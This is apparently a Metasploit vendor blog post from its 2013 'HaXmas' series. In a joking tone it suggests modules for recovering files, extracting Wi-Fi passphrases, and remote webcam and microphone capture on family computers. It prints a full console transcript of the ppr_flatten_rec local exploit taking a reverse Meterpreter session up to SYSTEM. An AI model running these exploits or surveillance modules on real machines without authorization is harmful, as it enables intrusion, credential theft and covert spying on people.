12 Days of HaXmas: Impress Your Family With Elite Metasploit Wizardry

Last updated at Wed, 07 Feb 2024 19:59:05 GMT

This post is the fourth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements in the Metasploit Framework over the course of 2013.

Every year during a major holiday, we crawl out from our own bat cave and actually spend time with our family and friends. People start asking you what you do for a living? You respond with something you probably regret like "I am a penetration tester.", because to an average person your job title probably sounds no different than a porn star, or that you can start a fire with your thoughts. After some clarification, they kind of grasp of what you do - apparently you do something magical with them computers. And then the inevitable happens: Your ma and pa, brothers and sisters, your uncle, and even the neighbor come to you and ask you to fix their computers, maybe do a demonstration like blowing up a computer like the movie "Live Free or Die Hard" they just saw.

Let's face it, you are your family computer wizard, and it's time to put your skills into "good use" like fixing their computers, and get them educated about the risks of accepting candy from strangers on the Internet. If you're a little overwhelmed, fear no more, because with Metasploit in hand you can do ANYTHING... well, almost anything. Here's a few common tricks that we actually find practical during a family reunion:

Lost File, Please Recover!

Metasploit has two extremely handy data recovery tools you can use. The first one is post/windows/gather/forensics/recovery_files.rb, brought to you by Borja Merino. The other is post/windows/gather/forensics/imager.rb, by Wesley McGrew.

The recovery_files module basically tries to recover files that got recently deleted. Borja already made a video while making the module, so we'll let the video do the talking:

The imager module functions a little bit like the dd command in Unix, except this is for Windows due to the use of Windows API (railgun). It will perform a byte-for-byte imaging of remote disks and volumes. Byte-for-byte obviously can be a time consuming task, so we advice leaving this option last.

What's the wireless password again?

Say everybody comes home for the holiday, and they've brought in all kinds of gadgets (XBOX One, Kindle Reader, laptops, smart phones, etc). Hey ma, what's the Wifi password? Your parents might not actually know the answer to that, and they blame the technician who set up the network months ago... or was it years ago? Your mission: to find the wifi password.

You can most likely do this by physically connecting to the wireless router and reset the password that way. Or on your parent's laptop, you can try the post/windows/wlan/wlan_profile post module to see if you can extract the passphrase from the keyMaterial element in the wifi profile.

Forgotten Administrator Password?

Sometimes it's almost impossible for a regular human being to not forget a password, like your family. The most common way is to reset it locally, often probably with a bootable disk (depends on the system). However, it is also possible to simply escalate privileges with whatever user account you have, and go from there. The most basic way is by using the getsystem command in meterpreter. If that doesn't work, you can try to pick a local exploit module like ppr_flatten_rec:

msf exploit(handler) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 10.0.1.91
[*] Meterpreter session 2 opened (10.0.1.76:4444 -> 10.0.1.91:49159) at 2013-12-25 16:30:04 -0600

meterpreter > getuid
Server username: WIN-6NH0Q8CJQVM\sinn3r
meterpreter > background
[*] Backgrounding session 2...

msf exploit(handler) > use exploit/windows/local/ppr_flatten_rec 

msf exploit(ppr_flatten_rec) > set session 2
session => 2
msf exploit(ppr_flatten_rec) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Launching notepad to host the exploit...
[+] Process 3784 launched.
[*] Reflectively injecting the exploit DLL into 3784...
[*] Injecting exploit into 3784 ...
[*] Exploit injected. Injecting payload into 3784...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 10 sec ...
[*] Sending stage (769024 bytes) to 10.0.1.91
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 3 opened (10.0.1.76:4444 -> 10.0.1.91:49160) at 2013-12-25 16:31:32 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

If you actually managed to escalate privileges, do them a favor and run a system update too while you're at it :-)

Hollywood Hacking for Entertainment

We haven't figured out how to remotely blow up a computer, but here's a few modules that make hacking easy to understand and fun. Surprisingly, kids love playing with these.

Webcam manipulation

Controlling webcam is pretty much a standard in Hollywood hacking, and you can do that with Metasploit too. Modules such as post/windows/manage/webcam or post/osx/manage/webcam; or the webcam_snap meterpreter command are great for this . It's not as awesome as Chatroulette like the one to the left though :-)

Microphone manipulation

Metasploit is also capable of audio recording. You can use the post/osx/manage/record_mic module, or post/multi/manage/record_mic.

Video Broadcasting

And of course, who can pass on the opportunity of rickrolling everybody on a holiday?

There are also plenty of Metasploit modules you can use for entertainment purposes, we encourage all of you to browser around our post module directory tree. But if you don't see anything you like, you can always file a feature request on Redmine and let us know. Or please feel free to submit your own :-)

As always, remember to run that msfupdate command to make sure you are up to date with Metasploit. For those of you who are new to Metasploit, you can download a copy here, and may the force be with you.